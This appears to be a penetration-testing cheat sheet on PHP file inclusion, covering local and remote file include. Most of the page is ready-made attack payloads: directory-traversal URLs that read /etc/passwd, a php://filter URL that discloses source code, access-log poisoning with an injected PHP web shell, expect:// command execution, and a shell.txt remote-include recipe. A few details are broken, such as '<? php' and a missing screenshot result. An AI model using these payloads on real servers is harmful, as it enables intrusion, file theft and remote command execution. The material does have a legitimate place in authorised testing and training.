File Inclusion

In a lot of applications, developers need to include files to load classes or to share some templates between multiple web pages.

File include vulnerabilities come from a lack of filtering when a user-controlled parameter is used as part of a file name in a call to an including function (require, require_once, include or include_once in PHP for example). If the call to one of these methods is vulnerable, an attacker will be able to manipulate the function to load his own code. File include vulnerabilities can also be used as a directory traversal to read arbitrary files. However, if the arbitrary code contains an opening PHP tag, the file will be interpreted as PHP code.

This including function can allow the loading of local resources or remote resource (a website, for example). If vulnerable, it will lead to:

  • Local File Include: LFI. A local file is read and interpreted.

  • Remote File Include: RFI. A remote file is retrieved and interpreted.

By default, PHP disables loading of remote files, thanks to the configuration option: allow_url_include.

One liner Payload :<?php system($_GET['param']); ?>

LFI

Payloads

## Directory Traversal
#Check with existing directory
http://URL/?id=/var/www/../../etc/passwd
#Using Null Byte
http://URL/?id=../../../etc/passwd%00

## LFI
#View PHP source-code
http://URL/index.php?page=php://filter/convert.base64-encode/resource=index

Access-Log Poisoning

Access Log Locations

  • RHEL / Red Hat / CentOS / Fedora Linux Apache access file location – /var/log/httpd/access_log

  • Debian / Ubuntu Linux Apache access log file location – /var/log/apache2/access.log

  • FreeBSD Apache access log file location – /var/log/httpd-access.log

Exploitation

  • Requests to the web browser are stored in the access.log page. This includes User-Agent fields which can be controlled by the attacker.

  • If the access.log file evaluates the code present within these entries, we can inject a payload into any of the request headers that are reflected in the access.log file.

  • Inject the correct syntax to avoid corrupting the access.log file, which will render the page useless.

<?php echo ('Testing for code execution'); ?>
<? php system($_REQUEST['cmd']); ?> 

Vulnerable index.php File

On this web application the vulnerability exists on the index.php file. By using: ../../../../var/log/apache2/access.log as a payload we were able to see the following:

As shown, we were able to load the PHPInfo file, meaning that our code was executed.

File Upload Race Condition

RFI

  • ftp://

  • http://

  • expect://

The PHP expect wrapper allows you to run system commands. The syntax of the exploit is:

expect://[command]

RFI To Code Exec

#Create a shell.txt which contains the payload:
<?php system($_REQUEST["cmd"]); ?>
<?php echo shell_exec($_REQUEST["cmd"]); ?>

#Access it
https://url.com?vuln_file.php=shell.txt&cmd=whoami

Last updated